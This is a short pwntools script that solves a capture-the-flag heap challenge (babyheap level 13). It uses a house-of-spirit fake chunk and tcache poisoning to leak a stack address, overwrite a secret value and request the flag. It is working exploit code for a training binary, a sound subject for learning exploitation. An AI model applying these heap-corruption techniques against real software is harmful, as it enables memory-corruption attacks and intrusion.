from pwn import *
# House of spirit to leak the stack address then calculate the offset to change the value of secret
r = process("/challenge/babyheap_level13.0")
r.sendline(b"malloc")
r.sendline(b"1")
r.sendline(b"300")
r.sendline(b"stack_scanf")
r.sendline(b'A'*48+p64(0x0)+p64(0x141))
r.sendline(b"stack_free")
r.sendline(b"malloc")
r.sendline(b"0")
r.sendline(b"300")
r.sendline(b"free")
r.sendline(b"0")
r.sendline(b"free")
r.sendline(b"1")
r.read()
r.sendline(b"puts")
r.sendline(b"1")
leak = r.read()[40:-1048]
leak = int.from_bytes(leak,byteorder='little')
leak = leak + 188
log.info(f"Stack Addr {hex(leak)}")
r.sendline(b"scanf")
r.sendline(b"1")
r.sendline(p64(leak))
for index in range(0,2):
	r.sendline(b"malloc")
	r.sendline(str(index).encode())
	r.sendline(b"300")
r.sendline(b"scanf")
r.sendline(b"1")
r.sendline(p64(0x0))
r.sendline("send_flag")
r.sendline(p64(0x0)+p64(0x0))
r.interactive()
